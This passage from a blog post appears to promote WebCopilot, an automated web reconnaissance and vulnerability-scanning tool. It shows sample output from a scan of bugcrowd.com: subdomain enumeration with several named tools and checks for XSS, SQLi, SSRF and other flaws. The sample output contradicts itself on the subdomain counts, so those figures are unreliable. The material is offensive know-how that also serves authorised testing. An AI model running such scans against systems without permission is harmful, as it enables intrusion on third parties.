/>░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░ ██║░░░<br />░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░<br />░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░ ░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░<br /> [●] @h4r5h1t.hrs | G!2m0<br /><br /><br />[❌] Warning: Use with caution. You are responsible for your own actions.<br />[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.<br /><br /><br />Target: bugcrowd.com<br />Output: /home/gizmo/targets/bugcrowd<br />Threads: 100<br />Server: False<br />Exclude: False<br />Mode: Running all Enumeration<br />Time: 30-08-2021 15:10:00<br /><br />[!] Please wait while scanning...<br /><br />[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com<br />[●] Subdoamin Scanned - [assetfinder✔] Subdomain Found: 34<br />[●] Subdoamin Scanned - [sublist3r✔] Subdomain Found: 29<br />[●] Subdoamin Scanned - [subfinder✔] Subdomain Found: 54<br />[●] Subdoamin Scanned - [amass✔] Subdomain Found: 43<br />[●] Subdoamin Scanned - [findomain✔] Subdomain Found: 27<br /><br />[●] Active Subdoamin Scanning is in progress:<br />[!] Please be patient. This may take a while...<br />[●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11<br />[●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0<br /><br />[●] Subdomain Scanning: Filtering out of scope subdomains<br />[●] Subdomain Scanning: Filtering Alive subdomains<br />[●] Subdomain Scanning: Getting titles of valid subdomains<br />[●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/<br /><br />[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30<br /><br />[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032<br />[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com<br />[●] Vulnerabilities Scanned - [XSS✔] Found: 0<br />[●] Vulnerabilities Scanned - [SQLi✔] Found: 0<br />[●] Vulnerabilities Scanned - [LFI✔] Found: 0<br />[●] Vulnerabilities Scanned - [CRLF✔] Found: 0<br />[●] Vulnerabilities Scanned - [SSRF✔] Found: 0<br />[●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0<br />[●] Vulnerabilities Scanned - [Open redirect✔] Found: 0<br />[●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0<br />[●] Vulnerabilities Scanned - [Nuclie✔] Found: 0<br />[●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/<br /><br /><br />▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀<br />▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░<br />▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░<br /><br />[+] Subdomains of bugcrowd.com<br />[+] Subdomains Found: 0<br />[+] Subdomains Alive: 0<br />[+] Endpoints: 11032<br />[+] XSS: 0<br />[+] SQLi: 0<br />[+] Open Redirect: 0<br />[+] SSRF: 0<br />[+] CRLF: 0<br />[+] LFI: 0<br />[+] Sensitive Data: 0<br />[+] Subdomain Takeover: 0<br />[+] Nuclei: 0</code></pre></div> <hr /> <h3 dir="auto" tabindex="-1">Acknowledgement</h3> <p dir="auto">WebCopilot is inspired from <a href="https://github.com/R0X4R/Garud" rel="nofollow" target="_blank" title="Garud">Garud</a> & <a href="https://github.com/R0X4R/Pinaak" rel="nofollow" target="_blank" title="Pinaak">Pinaak</a> by <a href="https://github.com/R0X4R/" rel="nofollow" target="_blank" title="ROX4R">ROX4R</a>.</p><p dir="auto"><br /></p><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/h4r5h1t/webcopilot" rel="nofollow" target="_blank" title="Download Webcopilot">Download Webcopilot</a></span></b></div>
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0